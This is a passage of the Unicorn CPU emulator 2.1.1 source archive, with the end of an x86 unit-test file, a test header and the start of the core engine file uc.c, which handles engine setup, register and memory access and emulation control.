TEST_IN_REG(RAX, 0x8877665544332211); TEST_IN_REG(RBX, 0x1122334455667788); TEST_OUT_REG(RAX, 0x1122334455667788); TEST_RUN(); } { uint8_t code[] = { // mov ax, bx (expected encoding) 0x66, 0x89, 0xD8, }; TEST_CODE(UC_MODE_64, code); TEST_IN_REG(RAX, 0x8877665544332211); TEST_IN_REG(RBX, 0x1122334455667788); TEST_OUT_REG(RAX, 0x8877665544337788); TEST_RUN(); } } TEST_LIST = { {"test_x86_in", test_x86_in}, {"test_x86_out", test_x86_out}, {"test_x86_mem_hook_all", test_x86_mem_hook_all}, {"test_x86_inc_dec_pxor", test_x86_inc_dec_pxor}, {"test_x86_relative_jump", test_x86_relative_jump}, {"test_x86_loop", test_x86_loop}, {"test_x86_invalid_mem_read", test_x86_invalid_mem_read}, {"test_x86_invalid_mem_write", test_x86_invalid_mem_write}, {"test_x86_invalid_jump", test_x86_invalid_jump}, {"test_x86_64_syscall", test_x86_64_syscall}, {"test_x86_16_add", test_x86_16_add}, {"test_x86_reg_save", test_x86_reg_save}, {"test_x86_invalid_mem_read_stop_in_cb", test_x86_invalid_mem_read_stop_in_cb}, {"test_x86_x87_fnstenv", test_x86_x87_fnstenv}, {"test_x86_mmio", test_x86_mmio}, {"test_x86_missing_code", test_x86_missing_code}, {"test_x86_smc_xor", test_x86_smc_xor}, {"test_x86_mmio_uc_mem_rw", test_x86_mmio_uc_mem_rw}, {"test_x86_sysenter", test_x86_sysenter}, {"test_x86_hook_cpuid", test_x86_hook_cpuid}, {"test_x86_486_cpuid", test_x86_486_cpuid}, {"test_x86_clear_tb_cache", test_x86_clear_tb_cache}, {"test_x86_clear_empty_tb", test_x86_clear_empty_tb}, {"test_x86_hook_tcg_op", test_x86_hook_tcg_op}, {"test_x86_cmpxchg", test_x86_cmpxchg}, {"test_x86_nested_emu_start", test_x86_nested_emu_start}, {"test_x86_nested_emu_stop", test_x86_nested_emu_stop}, {"test_x86_64_nested_emu_start_error", test_x86_64_nested_emu_start_error}, {"test_x86_eflags_reserved_bit", test_x86_eflags_reserved_bit}, 
{"test_x86_nested_uc_emu_start_exits", test_x86_nested_uc_emu_start_exits}, {"test_x86_clear_count_cache", test_x86_clear_count_cache}, {"test_x86_correct_address_in_small_jump_hook", test_x86_correct_address_in_small_jump_hook}, {"test_x86_correct_address_in_long_jump_hook", test_x86_correct_address_in_long_jump_hook}, {"test_x86_invalid_vex_l", test_x86_invalid_vex_l}, #if !defined(TARGET_READ_INLINED) && defined(BOOST_LITTLE_ENDIAN) {"test_x86_unaligned_access", test_x86_unaligned_access}, #endif {"test_x86_lazy_mapping", test_x86_lazy_mapping}, {"test_x86_16_incorrect_ip", test_x86_16_incorrect_ip}, {"test_x86_mmu", test_x86_mmu}, {"test_x86_vtlb", test_x86_vtlb}, {"test_x86_segmentation", test_x86_segmentation}, {"test_x86_0xff_lcall", test_x86_0xff_lcall}, {"test_x86_64_not_overwriting_tmp0_for_pc_update", test_x86_64_not_overwriting_tmp0_for_pc_update}, {"test_fxsave_fpip_x86", test_fxsave_fpip_x86}, {"test_fxsave_fpip_x64", test_fxsave_fpip_x64}, {"test_bswap_x64", test_bswap_ax}, {"test_rex_x64", test_rex_x64}, {NULL, NULL}}; ������������������������������������unicorn-2.1.1/tests/unit/unicorn_test.h�������������������������������������������������������������0000664�0000000�0000000�00000003735�14675241067�0020222�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#ifndef UNICORN_TEST_H #define UNICORN_TEST_H #include <stdio.h> #include <stdint.h> #include <unicorn/unicorn.h> #include "acutest.h" #include "endian.h" // Copied from glibc-2.29 /* Swap bytes in 32 bit value. */ #define bswap_32(x) \ ((((x)&0xff000000u) >> 24) | (((x)&0x00ff0000u) >> 8) | \ (((x)&0x0000ff00u) << 8) | (((x)&0x000000ffu) << 24)) /* Swap bytes in 64 bit value. 
unicorn-2.1.1/uc.c
/* Unicorn Emulator Engine */ /* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015 */ /* Modified for Unicorn Engine by Chen Huitao<chenhuitao@hfmrit.com>, 2020 */ #include "unicorn/unicorn.h" #if defined(UNICORN_HAS_OSXKERNEL) #include <libkern/libkern.h> #else #include <stddef.h> #include <stdio.h> #include <stdlib.h> #endif #include <time.h> // nanosleep #include <string.h> #include "uc_priv.h" // target specific headers #include "qemu/target/m68k/unicorn.h" #include "qemu/target/i386/unicorn.h" #include "qemu/target/arm/unicorn.h" #include "qemu/target/mips/unicorn.h" #include "qemu/target/sparc/unicorn.h" #include "qemu/target/ppc/unicorn.h" #include "qemu/target/riscv/unicorn.h" #include "qemu/target/s390x/unicorn.h" #include "qemu/target/tricore/unicorn.h" #include "qemu/include/tcg/tcg-apple-jit.h" #include "qemu/include/qemu/queue.h" #include "qemu-common.h" static void clear_deleted_hooks(uc_engine *uc); static uc_err uc_snapshot(uc_engine *uc); static uc_err uc_restore_latest_snapshot(uc_engine *uc); #if defined(__APPLE__) && defined(HAVE_PTHREAD_JIT_PROTECT) && \ defined(HAVE_SPRR) && (defined(__arm__) || defined(__aarch64__)) static void save_jit_state(uc_engine *uc) { if (!uc->nested) { uc->thread_executable_entry = thread_executable(); uc->current_executable = uc->thread_executable_entry; } uc->nested += 1; } static void restore_jit_state(uc_engine *uc) { assert(uc->nested > 0); if (uc->nested == 1) { assert(uc->current_executable == thread_executable()); if (uc->current_executable != uc->thread_executable_entry) { if (uc->thread_executable_entry) { jit_write_protect(true); } else { jit_write_protect(false); } } } uc->nested -= 1; } #else static void save_jit_state(uc_engine *uc) { (void)uc; } static void restore_jit_state(uc_engine *uc) { (void)uc; } #endif static void *hook_insert(struct list *l, struct hook *h) { void *item = list_insert(l, (void *)h); if (item) { h->refs++; } return item; } static void *hook_append(struct list *l, struct hook *h) { void *item = list_append(l, (void *)h); if (item) { h->refs++; } return item; } static void
hook_invalidate_region(void *key, void *data, void *opaq) { uc_engine *uc = (uc_engine *)opaq; HookedRegion *region = (HookedRegion *)key; uc->uc_invalidate_tb(uc, region->start, region->length); } static void hook_delete(void *data) { struct hook *h = (struct hook *)data; h->refs--; if (h->refs == 0) { g_hash_table_destroy(h->hooked_regions); free(h); } } UNICORN_EXPORT unsigned int uc_version(unsigned int *major, unsigned int *minor) { if (major != NULL && minor != NULL) { *major = UC_API_MAJOR; *minor = UC_API_MINOR; } return (UC_API_MAJOR << 24) + (UC_API_MINOR << 16) + (UC_API_PATCH << 8) + UC_API_EXTRA; } static uc_err default_reg_read(void *env, int mode, unsigned int regid, void *value, size_t *size) { return UC_ERR_HANDLE; } static uc_err default_reg_write(void *env, int mode, unsigned int regid, const void *value, size_t *size, int *setpc) { return UC_ERR_HANDLE; } UNICORN_EXPORT uc_err uc_errno(uc_engine *uc) { return uc->errnum; } UNICORN_EXPORT const char *uc_strerror(uc_err code) { switch (code) { default: return "Unknown error code"; case UC_ERR_OK: return "OK (UC_ERR_OK)"; case UC_ERR_NOMEM: return "No memory available or memory not present (UC_ERR_NOMEM)"; case UC_ERR_ARCH: return "Invalid/unsupported architecture (UC_ERR_ARCH)"; case UC_ERR_HANDLE: return "Invalid handle (UC_ERR_HANDLE)"; case UC_ERR_MODE: return "Invalid mode (UC_ERR_MODE)"; case UC_ERR_VERSION: return "Different API version between core & binding (UC_ERR_VERSION)"; case UC_ERR_READ_UNMAPPED: return "Invalid memory read (UC_ERR_READ_UNMAPPED)"; case UC_ERR_WRITE_UNMAPPED: return "Invalid memory write (UC_ERR_WRITE_UNMAPPED)"; case UC_ERR_FETCH_UNMAPPED: return "Invalid memory fetch (UC_ERR_FETCH_UNMAPPED)"; case UC_ERR_HOOK: return "Invalid hook type (UC_ERR_HOOK)"; case UC_ERR_INSN_INVALID: return "Invalid instruction (UC_ERR_INSN_INVALID)"; case UC_ERR_MAP: return "Invalid memory mapping (UC_ERR_MAP)"; case UC_ERR_WRITE_PROT: return "Write to write-protected memory (UC_ERR_WRITE_PROT)"; case UC_ERR_READ_PROT: return "Read from non-readable memory (UC_ERR_READ_PROT)"; case UC_ERR_FETCH_PROT: return "Fetch from non-executable memory (UC_ERR_FETCH_PROT)"; case UC_ERR_ARG: return "Invalid argument (UC_ERR_ARG)"; case UC_ERR_READ_UNALIGNED: return "Read from unaligned memory (UC_ERR_READ_UNALIGNED)"; case UC_ERR_WRITE_UNALIGNED: return "Write to unaligned memory (UC_ERR_WRITE_UNALIGNED)"; case UC_ERR_FETCH_UNALIGNED: return "Fetch from unaligned memory (UC_ERR_FETCH_UNALIGNED)"; case UC_ERR_RESOURCE: return "Insufficient resource (UC_ERR_RESOURCE)"; case UC_ERR_EXCEPTION: return "Unhandled CPU exception (UC_ERR_EXCEPTION)"; case UC_ERR_OVERFLOW: return "Provided buffer is too small (UC_ERR_OVERFLOW)"; } } UNICORN_EXPORT bool uc_arch_supported(uc_arch arch) { switch (arch) { #ifdef UNICORN_HAS_ARM case UC_ARCH_ARM: return true; #endif #ifdef UNICORN_HAS_ARM64 case UC_ARCH_ARM64: return true; #endif #ifdef UNICORN_HAS_M68K case UC_ARCH_M68K: return true; #endif #ifdef UNICORN_HAS_MIPS case UC_ARCH_MIPS: return true; #endif #ifdef UNICORN_HAS_PPC case UC_ARCH_PPC: return true; #endif #ifdef UNICORN_HAS_SPARC case UC_ARCH_SPARC: return true; #endif #ifdef UNICORN_HAS_X86 case UC_ARCH_X86: return true; #endif #ifdef UNICORN_HAS_RISCV case UC_ARCH_RISCV: return true; #endif #ifdef UNICORN_HAS_S390X case UC_ARCH_S390X: return true; #endif #ifdef UNICORN_HAS_TRICORE case UC_ARCH_TRICORE: return true; #endif /* Invalid or disabled arch */ default: return false; } } #define UC_INIT(uc) \ save_jit_state(uc); \ if 
(unlikely(!(uc)->init_done)) { \ int __init_ret = uc_init_engine(uc); \ if (unlikely(__init_ret != UC_ERR_OK)) { \ return __init_ret; \ } \ } static gint uc_exits_cmp(gconstpointer a, gconstpointer b, gpointer user_data) { uint64_t lhs = *((uint64_t *)a); uint64_t rhs = *((uint64_t *)b); if (lhs < rhs) { return -1; } else if (lhs == rhs) { return 0; } else { return 1; } } static uc_err uc_init_engine(uc_engine *uc) { if (uc->init_done) { return UC_ERR_HANDLE; } uc->hooks_to_del.delete_fn = hook_delete; for (int i = 0; i < UC_HOOK_MAX; i++) { uc->hook[i].delete_fn = hook_delete; } uc->ctl_exits = g_tree_new_full(uc_exits_cmp, NULL, g_free, NULL); if (machine_initialize(uc)) { return UC_ERR_RESOURCE; } // init tlb function if (!uc->cpu->cc->tlb_fill) { uc->set_tlb(uc, UC_TLB_CPU); } // init fpu softfloat uc->softfloat_initialize(); if (uc->reg_reset) { uc->reg_reset(uc); } uc->context_content = UC_CTL_CONTEXT_CPU; uc->unmapped_regions = g_array_new(false, false, sizeof(MemoryRegion *)); uc->init_done = true; return UC_ERR_OK; } UNICORN_EXPORT uc_err uc_open(uc_arch arch, uc_mode mode, uc_engine **result) { struct uc_struct *uc; if (arch < UC_ARCH_MAX) { uc = calloc(1, sizeof(*uc)); if (!uc) { // memory insufficient return UC_ERR_NOMEM; } /* qemu/exec.c: phys_map_node_reserve() */ uc->alloc_hint = 16; uc->errnum = UC_ERR_OK; uc->arch = arch; uc->mode = mode; uc->reg_read = default_reg_read; uc->reg_write = default_reg_write; // uc->ram_list = { .blocks = QLIST_HEAD_INITIALIZER(ram_list.blocks) }; QLIST_INIT(&uc->ram_list.blocks); QTAILQ_INIT(&uc->memory_listeners); QTAILQ_INIT(&uc->address_spaces); switch (arch) { default: break; #ifdef UNICORN_HAS_M68K case UC_ARCH_M68K: if ((mode & ~UC_MODE_M68K_MASK) || !(mode & UC_MODE_BIG_ENDIAN)) { free(uc); return UC_ERR_MODE; } uc->init_arch = uc_init_m68k; break; #endif #ifdef UNICORN_HAS_X86 case UC_ARCH_X86: if ((mode & ~UC_MODE_X86_MASK) || (mode & UC_MODE_BIG_ENDIAN) || !(mode & (UC_MODE_16 | UC_MODE_32 | UC_MODE_64))) { free(uc); return UC_ERR_MODE; } uc->init_arch = uc_init_x86_64; break; #endif #ifdef UNICORN_HAS_ARM case UC_ARCH_ARM: if ((mode & ~UC_MODE_ARM_MASK)) { free(uc); return UC_ERR_MODE; } uc->init_arch = uc_init_arm; if (mode & UC_MODE_THUMB) { uc->thumb = 1; } break; #endif #ifdef UNICORN_HAS_ARM64 case UC_ARCH_ARM64: if (mode & ~UC_MODE_ARM_MASK) { free(uc); return UC_ERR_MODE; } uc->init_arch = uc_init_aarch64; break; #endif #if defined(UNICORN_HAS_MIPS) || defined(UNICORN_HAS_MIPSEL) || \ defined(UNICORN_HAS_MIPS64) || defined(UNICORN_HAS_MIPS64EL) case UC_ARCH_MIPS: if ((mode & ~UC_MODE_MIPS_MASK) || !(mode & (UC_MODE_MIPS32 | UC_MODE_MIPS64))) { free(uc); return UC_ERR_MODE; } if (mode & UC_MODE_BIG_ENDIAN) { #ifdef UNICORN_HAS_MIPS if (mode & UC_MODE_MIPS32) { uc->init_arch = uc_init_mips; } #endif #ifdef UNICORN_HAS_MIPS64 if (mode & UC_MODE_MIPS64) { uc->init_arch = uc_init_mips64; } #endif } else { // little endian #ifdef UNICORN_HAS_MIPSEL if (mode & UC_MODE_MIPS32) { uc->init_arch = uc_init_mipsel; } #endif #ifdef UNICORN_HAS_MIPS64EL if (mode & UC_MODE_MIPS64) { uc->init_arch = uc_init_mips64el; } #endif } break; #endif #ifdef UNICORN_HAS_SPARC case UC_ARCH_SPARC: if ((mode & ~UC_MODE_SPARC_MASK) || !(mode & UC_MODE_BIG_ENDIAN) || !(mode & (UC_MODE_SPARC32 | UC_MODE_SPARC64))) { free(uc); return UC_ERR_MODE; } if (mode & UC_MODE_SPARC64) { uc->init_arch = uc_init_sparc64; } else { uc->init_arch = uc_init_sparc; } break; #endif #ifdef UNICORN_HAS_PPC case UC_ARCH_PPC: if ((mode & ~UC_MODE_PPC_MASK) || !(mode & 
UC_MODE_BIG_ENDIAN) || !(mode & (UC_MODE_PPC32 | UC_MODE_PPC64))) { free(uc); return UC_ERR_MODE; } if (mode & UC_MODE_PPC64) { uc->init_arch = uc_init_ppc64; } else { uc->init_arch = uc_init_ppc; } break; #endif #ifdef UNICORN_HAS_RISCV case UC_ARCH_RISCV: if ((mode & ~UC_MODE_RISCV_MASK) || !(mode & (UC_MODE_RISCV32 | UC_MODE_RISCV64))) { free(uc); return UC_ERR_MODE; } if (mode & UC_MODE_RISCV32) { uc->init_arch = uc_init_riscv32; } else if (mode & UC_MODE_RISCV64) { uc->init_arch = uc_init_riscv64; } else { free(uc); return UC_ERR_MODE; } break; #endif #ifdef UNICORN_HAS_S390X case UC_ARCH_S390X: if ((mode & ~UC_MODE_S390X_MASK) || !(mode & UC_MODE_BIG_ENDIAN)) { free(uc); return UC_ERR_MODE; } uc->init_arch = uc_init_s390x; break; #endif #ifdef UNICORN_HAS_TRICORE case UC_ARCH_TRICORE: if ((mode & ~UC_MODE_TRICORE_MASK)) { free(uc); return UC_ERR_MODE; } uc->init_arch = uc_init_tricore; break; #endif } if (uc->init_arch == NULL) { free(uc); return UC_ERR_ARCH; } uc->init_done = false; uc->cpu_model = INT_MAX; // INT_MAX means the default cpu model. *result = uc; return UC_ERR_OK; } else { return UC_ERR_ARCH; } } UNICORN_EXPORT uc_err uc_close(uc_engine *uc) { int i; MemoryRegion *mr; if (!uc->init_done) { free(uc); return UC_ERR_OK; } // Cleanup internally. if (uc->release) { uc->release(uc->tcg_ctx); } g_free(uc->tcg_ctx); // Cleanup CPU. g_free(uc->cpu->cpu_ases); g_free(uc->cpu->thread); /* cpu */ free(uc->cpu); /* flatviews */ g_hash_table_destroy(uc->flat_views); // During flatviews destruction, we may still access memory regions. // So we free them afterwards. /* memory */ mr = &uc->io_mem_unassigned; mr->destructor(mr); mr = uc->system_io; mr->destructor(mr); mr = uc->system_memory; mr->destructor(mr); g_free(uc->system_memory); g_free(uc->system_io); for (size_t i = 0; i < uc->unmapped_regions->len; i++) { mr = g_array_index(uc->unmapped_regions, MemoryRegion *, i); mr->destructor(mr); g_free(mr); } g_array_free(uc->unmapped_regions, true); // Thread-related data. if (uc->qemu_thread_data) { g_free(uc->qemu_thread_data); } /* free */ g_free(uc->init_target_page); // Other auxiliaries. g_free(uc->l1_map); if (uc->bounce.buffer) { qemu_vfree(uc->bounce.buffer); } // free hooks and hook lists clear_deleted_hooks(uc); for (i = 0; i < UC_HOOK_MAX; i++) { list_clear(&uc->hook[i]); } free(uc->mapped_blocks); g_tree_destroy(uc->ctl_exits); // finally, free uc itself.
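/*
 * Illustrative lifecycle from the caller's side (not part of this file;
 * error handling elided). The handle must not be used after uc_close():
 *
 *     uc_engine *handle;
 *     if (uc_open(UC_ARCH_X86, UC_MODE_32, &handle) == UC_ERR_OK) {
 *         // ... uc_mem_map(), uc_emu_start(), etc. ...
 *         uc_close(handle);
 *     }
 *
 * Zeroing the struct before freeing (below) presumably makes accidental
 * use-after-close fail fast rather than corrupt memory silently.
 */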
memset(uc, 0, sizeof(*uc)); free(uc); return UC_ERR_OK; } UNICORN_EXPORT uc_err uc_reg_read_batch(uc_engine *uc, int *regs, void **vals, int count) { UC_INIT(uc); reg_read_t reg_read = uc->reg_read; void *env = uc->cpu->env_ptr; int mode = uc->mode; int i; for (i = 0; i < count; i++) { unsigned int regid = regs[i]; void *value = vals[i]; size_t size = (size_t)-1; uc_err err = reg_read(env, mode, regid, value, &size); if (err) { restore_jit_state(uc); return err; } } restore_jit_state(uc); return UC_ERR_OK; } UNICORN_EXPORT uc_err uc_reg_write_batch(uc_engine *uc, int *regs, void *const *vals, int count) { UC_INIT(uc); reg_write_t reg_write = uc->reg_write; void *env = uc->cpu->env_ptr; int mode = uc->mode; int setpc = 0; int i; for (i = 0; i < count; i++) { unsigned int regid = regs[i]; const void *value = vals[i]; size_t size = (size_t)-1; uc_err err = reg_write(env, mode, regid, value, &size, &setpc); if (err) { restore_jit_state(uc); return err; } } if (setpc) { // force to quit execution and flush TB uc->quit_request = true; break_translation_loop(uc); } restore_jit_state(uc); return UC_ERR_OK; } UNICORN_EXPORT uc_err uc_reg_read_batch2(uc_engine *uc, int *regs, void *const *vals, size_t *sizes, int count) { UC_INIT(uc); reg_read_t reg_read = uc->reg_read; void *env = uc->cpu->env_ptr; int mode = uc->mode; int i; for (i = 0; i < count; i++) { unsigned int regid = regs[i]; void *value = vals[i]; uc_err err = reg_read(env, mode, regid, value, sizes + i); if (err) { restore_jit_state(uc); return err; } } restore_jit_state(uc); return UC_ERR_OK; } UNICORN_EXPORT uc_err uc_reg_write_batch2(uc_engine *uc, int *regs, const void *const *vals, size_t *sizes, int count) { UC_INIT(uc); reg_write_t reg_write = uc->reg_write; void *env = uc->cpu->env_ptr; int mode = uc->mode; int setpc = 0; int i; for (i = 0; i < count; i++) { unsigned int regid = regs[i]; const void *value = vals[i]; uc_err err = reg_write(env, mode, regid, value, sizes + i, &setpc); if (err) { restore_jit_state(uc); return err; } } if (setpc) { // force to quit execution and flush TB uc->quit_request = true; break_translation_loop(uc); } restore_jit_state(uc); return UC_ERR_OK; } UNICORN_EXPORT uc_err uc_reg_read(uc_engine *uc, int regid, void *value) { UC_INIT(uc); size_t size = (size_t)-1; uc_err err = uc->reg_read(uc->cpu->env_ptr, uc->mode, regid, value, &size); restore_jit_state(uc); return err; } UNICORN_EXPORT uc_err uc_reg_write(uc_engine *uc, int regid, const void *value) { UC_INIT(uc); int setpc = 0; size_t size = (size_t)-1; uc_err err = uc->reg_write(uc->cpu->env_ptr, uc->mode, regid, value, &size, &setpc); if (err) { restore_jit_state(uc); return err; } if (setpc) { // force to quit execution and flush TB uc->quit_request = true; break_translation_loop(uc); } restore_jit_state(uc); return UC_ERR_OK; } UNICORN_EXPORT uc_err uc_reg_read2(uc_engine *uc, int regid, void *value, size_t *size) { UC_INIT(uc); uc_err err = uc->reg_read(uc->cpu->env_ptr, uc->mode, regid, value, size); restore_jit_state(uc); return err; } UNICORN_EXPORT uc_err uc_reg_write2(uc_engine *uc, int regid, const void *value, size_t *size) { UC_INIT(uc); int setpc = 0; uc_err err = uc->reg_write(uc->cpu->env_ptr, uc->mode, regid, value, size, &setpc); if (err) { restore_jit_state(uc); return err; } if (setpc) { // force to quit execution and flush TB uc->quit_request = true; break_translation_loop(uc); } restore_jit_state(uc); return UC_ERR_OK; } static size_t memory_region_len(uc_engine *uc, MemoryRegion *mr, uint64_t address, size_t count) { hwaddr 
end = mr->end; while (mr->container != uc->system_memory) { mr = mr->container; end += mr->addr; } return (size_t)MIN(count, end - address); } // check if a memory area is mapped // this is complicated because an area can overlap adjacent blocks static bool check_mem_area(uc_engine *uc, uint64_t address, size_t size) { size_t count = 0, len; while (count < size) { MemoryRegion *mr = uc->memory_mapping(uc, address); if (mr) { len = memory_region_len(uc, mr, address, size - count); count += len; address += len; } else { // this address is not mapped in yet break; } } return (count == size); } UNICORN_EXPORT uc_err uc_mem_read(uc_engine *uc, uint64_t address, void *_bytes, size_t size) { size_t count = 0, len; uint8_t *bytes = _bytes; UC_INIT(uc); // qemu cpu_physical_memory_rw() size is an int if (size > INT_MAX) { restore_jit_state(uc); return UC_ERR_ARG; } if (!check_mem_area(uc, address, size)) { restore_jit_state(uc); return UC_ERR_READ_UNMAPPED; } // memory area can overlap adjacent memory blocks while (count < size) { MemoryRegion *mr = uc->memory_mapping(uc, address); if (mr) { len = memory_region_len(uc, mr, address, size - count); if (uc->read_mem(&uc->address_space_memory, address, bytes, len) == false) { break; } count += len; address += len; bytes += len; } else { // this address is not mapped in yet break; } } if (count == size) { restore_jit_state(uc); return UC_ERR_OK; } else { restore_jit_state(uc); return UC_ERR_READ_UNMAPPED; } } UNICORN_EXPORT uc_err uc_mem_write(uc_engine *uc, uint64_t address, const void *_bytes, size_t size) { size_t count = 0, len; const uint8_t *bytes = _bytes; UC_INIT(uc); // qemu cpu_physical_memory_rw() size is an int if (size > INT_MAX) { restore_jit_state(uc); return UC_ERR_ARG; } if (!check_mem_area(uc, address, size)) { restore_jit_state(uc); return UC_ERR_WRITE_UNMAPPED; } // memory area can overlap adjacent memory blocks while (count < size) { MemoryRegion *mr = uc->memory_mapping(uc, address); if (mr) { uint32_t operms = mr->perms; uint64_t align = uc->target_page_align; if (!(operms & UC_PROT_WRITE)) { // write protected // but this is not the program accessing memory, so temporarily // mark writable uc->readonly_mem(mr, false); } len = memory_region_len(uc, mr, address, size - count); if (uc->snapshot_level && uc->snapshot_level > mr->priority) { mr = uc->memory_cow(uc, mr, address & ~align, (len + (address & align) + align) & ~align); if (!mr) { return UC_ERR_NOMEM; } } if (uc->write_mem(&uc->address_space_memory, address, bytes, len) == false) { break; } if (!(operms & UC_PROT_WRITE)) { // write protected // now write protect it again uc->readonly_mem(mr, true); } count += len; address += len; bytes += len; } else { // this address is not mapped in yet break; } } if (count == size) { restore_jit_state(uc); return UC_ERR_OK; } else { restore_jit_state(uc); return UC_ERR_WRITE_UNMAPPED; } } #define TIMEOUT_STEP 2 // microseconds static void *_timeout_fn(void *arg) { struct uc_struct *uc = arg; int64_t current_time = get_clock(); do { usleep(TIMEOUT_STEP); // perhaps emulation is even done before timeout? if (uc->emulation_done) { break; } } while ((uint64_t)(get_clock() - current_time) < uc->timeout); // timeout before emulation is done? 
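/*
 * Caller-side view (illustrative, not part of this file): this polling
 * timer services the timeout argument of uc_emu_start(), which is given
 * in microseconds; ADDRESS and SIZE below are placeholders:
 *
 *     // give up after at most one second of wall-clock time
 *     uc_emu_start(uc, ADDRESS, ADDRESS + SIZE, 1000 * 1000, 0);
 */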
if (!uc->emulation_done) { uc->timed_out = true; // force emulation to stop uc_emu_stop(uc); } return NULL; } static void enable_emu_timer(uc_engine *uc, uint64_t timeout) { uc->timeout = timeout; qemu_thread_create(uc, &uc->timer, "timeout", _timeout_fn, uc, QEMU_THREAD_JOINABLE); } static void hook_count_cb(struct uc_struct *uc, uint64_t address, uint32_t size, void *user_data) { // count this instruction. ah ah ah. uc->emu_counter++; // printf(":: emu counter = %u, at %lx\n", uc->emu_counter, address); if (uc->emu_counter > uc->emu_count) { // printf(":: emu counter = %u, stop emulation\n", uc->emu_counter); uc_emu_stop(uc); } } static void clear_deleted_hooks(uc_engine *uc) { struct list_item *cur; struct hook *hook; int i; for (cur = uc->hooks_to_del.head; cur != NULL && (hook = (struct hook *)cur->data); cur = cur->next) { assert(hook->to_delete); for (i = 0; i < UC_HOOK_MAX; i++) { if (list_remove(&uc->hook[i], (void *)hook)) { break; } } } list_clear(&uc->hooks_to_del); } UNICORN_EXPORT uc_err uc_emu_start(uc_engine *uc, uint64_t begin, uint64_t until, uint64_t timeout, size_t count) { uc_err err; // reset the counter uc->emu_counter = 0; uc->invalid_error = UC_ERR_OK; uc->emulation_done = false; uc->size_recur_mem = 0; uc->timed_out = false; uc->first_tb = true; // Avoid having nested uc_emu_start calls save wrong jit states. if (uc->nested_level == 0) { UC_INIT(uc); } // Advance the nested levels. We must decrease the level count by one when // we return from uc_emu_start. if (uc->nested_level >= UC_MAX_NESTED_LEVEL) { // We can't support so many nested levels. return UC_ERR_RESOURCE; } uc->nested_level++; uint32_t begin_pc32 = READ_DWORD(begin); switch (uc->arch) { default: break; #ifdef UNICORN_HAS_M68K case UC_ARCH_M68K: uc_reg_write(uc, UC_M68K_REG_PC, &begin_pc32); break; #endif #ifdef UNICORN_HAS_X86 case UC_ARCH_X86: switch (uc->mode) { default: break; case UC_MODE_16: { uint16_t ip; uint16_t cs; uc_reg_read(uc, UC_X86_REG_CS, &cs); // compensate for later adding up IP & CS ip = begin - cs * 16; uc_reg_write(uc, UC_X86_REG_IP, &ip); break; } case UC_MODE_32: uc_reg_write(uc, UC_X86_REG_EIP, &begin_pc32); break; case UC_MODE_64: uc_reg_write(uc, UC_X86_REG_RIP, &begin); break; } break; #endif #ifdef UNICORN_HAS_ARM case UC_ARCH_ARM: uc_reg_write(uc, UC_ARM_REG_R15, &begin_pc32); break; #endif #ifdef UNICORN_HAS_ARM64 case UC_ARCH_ARM64: uc_reg_write(uc, UC_ARM64_REG_PC, &begin); break; #endif #ifdef UNICORN_HAS_MIPS case UC_ARCH_MIPS: // TODO: MIPS32/MIPS64/BIGENDIAN etc uc_reg_write(uc, UC_MIPS_REG_PC, &begin_pc32); break; #endif #ifdef UNICORN_HAS_SPARC case UC_ARCH_SPARC: // TODO: Sparc/Sparc64 uc_reg_write(uc, UC_SPARC_REG_PC, &begin); break; #endif #ifdef UNICORN_HAS_PPC case UC_ARCH_PPC: if (uc->mode & UC_MODE_PPC64) { uc_reg_write(uc, UC_PPC_REG_PC, &begin); } else { uc_reg_write(uc, UC_PPC_REG_PC, &begin_pc32); } break; #endif #ifdef UNICORN_HAS_RISCV case UC_ARCH_RISCV: if (uc->mode & UC_MODE_RISCV64) { uc_reg_write(uc, UC_RISCV_REG_PC, &begin); } else { uc_reg_write(uc, UC_RISCV_REG_PC, &begin_pc32); } break; #endif #ifdef UNICORN_HAS_S390X case UC_ARCH_S390X: uc_reg_write(uc, UC_S390X_REG_PC, &begin); break; #endif #ifdef UNICORN_HAS_TRICORE case UC_ARCH_TRICORE: uc_reg_write(uc, UC_TRICORE_REG_PC, &begin_pc32); break; #endif } uc->stop_request = false; uc->emu_count = count; // remove count hook if counting isn't necessary if (count <= 0 && uc->count_hook != 0) { uc_hook_del(uc, uc->count_hook); uc->count_hook = 0; // In this case, we have to drop all translated blocks.
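/*
 * Translated blocks bake the count-hook call in at translation time, so
 * simply removing the hook is not enough; stale blocks must be flushed
 * below. Caller-side view (illustrative): this hook backs the @count
 * argument of uc_emu_start(), where ADDRESS is a placeholder:
 *
 *     uc_emu_start(uc, ADDRESS, 0, 0, 10); // at most 10 instructions
 */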
uc->tb_flush(uc); } // set up count hook to count instructions. if (count > 0 && uc->count_hook == 0) { uc_err err; // callback to count instructions must be run before everything else, // so instead of appending, we must insert the hook at the beginning // of the hook list uc->hook_insert = 1; err = uc_hook_add(uc, &uc->count_hook, UC_HOOK_CODE, hook_count_cb, NULL, 1, 0); // restore to append mode for uc_hook_add() uc->hook_insert = 0; if (err != UC_ERR_OK) { uc->nested_level--; return err; } } // If UC_CTL_UC_USE_EXITS is set, then the @until param won't have any // effect. This is designed for backward compatibility. if (!uc->use_exits) { uc->exits[uc->nested_level - 1] = until; } if (timeout) { enable_emu_timer(uc, timeout * 1000); // microseconds -> nanoseconds } uc->vm_start(uc); uc->nested_level--; // emulation is done if and only if we exit the outer uc_emu_start, // otherwise we may lose a pending uc_emu_stop if (uc->nested_level == 0) { uc->emulation_done = true; // remove hooks to delete // make sure we delete all hooks at the first level. clear_deleted_hooks(uc); restore_jit_state(uc); } if (timeout) { // wait for the timer to finish qemu_thread_join(&uc->timer); } // We may be in a nested uc_emu_start and thus clear invalid_error // once we are done. err = uc->invalid_error; uc->invalid_error = 0; return err; } UNICORN_EXPORT uc_err uc_emu_stop(uc_engine *uc) { UC_INIT(uc); uc->stop_request = true; uc_err err = break_translation_loop(uc); restore_jit_state(uc); return err; } // return target index where a memory region at the address exists, or could be // inserted // // address either is inside the mapping at the returned index, or is in free // space before the next mapping. // // if there is overlap between regions, the ending address will be higher than // the starting address of the mapping at the returned index static int bsearch_mapped_blocks(const uc_engine *uc, uint64_t address) { int left, right, mid; MemoryRegion *mapping; left = 0; right = uc->mapped_block_count; while (left < right) { mid = left + (right - left) / 2; mapping = uc->mapped_blocks[mid]; if (mapping->end - 1 < address) { left = mid + 1; } else if (mapping->addr > address) { right = mid; } else { return mid; } } return left; } // find if a memory range overlaps with existing mapped regions static bool memory_overlap(struct uc_struct *uc, uint64_t begin, size_t size) { unsigned int i; 